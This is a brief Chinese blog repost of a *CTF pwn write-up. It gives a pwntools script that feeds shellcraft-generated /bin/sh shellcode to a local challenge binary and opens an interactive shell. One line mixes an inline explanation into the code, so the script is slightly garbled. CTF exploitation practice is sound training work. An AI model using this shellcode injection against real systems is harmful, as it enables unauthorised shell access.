首页 > 系统服务 > 详细

*CTF——shellcode

时间:2019-04-29 01:16:49      阅读:552      评论:0      收藏:0      [点我收藏+]

一看题目是利用shellcode解决问题

伪代码:

技术分享图片

技术分享图片

checksec:开启了NX

exp:

from pwn import*
   context(os=‘linux‘,arch=‘amd64‘,log_level=‘debug‘)
   p = process(‘./shellcode‘)
   shellcode =‘s\x00‘+ asm(shellcraft.sh()):‘s\x00‘是进入循环,shellcraft.sh()则是执行/bin/sh的shellcode了
   p.recvuntil("give me shellcode, plz:\n")
   p.sendline(shellcode)                                                                                 
   p.interactive()

shellcraft模块是shellcode的模块,包含一些生成shellcode的函数。
其中的子模块声明架构,比如:

shellcraft.arm 是ARM架构的,

shellcraft.amd64是AMD64架构,

shellcraft.i386是Intel 80386架构的,

shellcraft.common是所有架构通用的。


 

*CTF——shellcode

原文:https://www.cnblogs.com/ctf-pwn-player/p/10787731.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!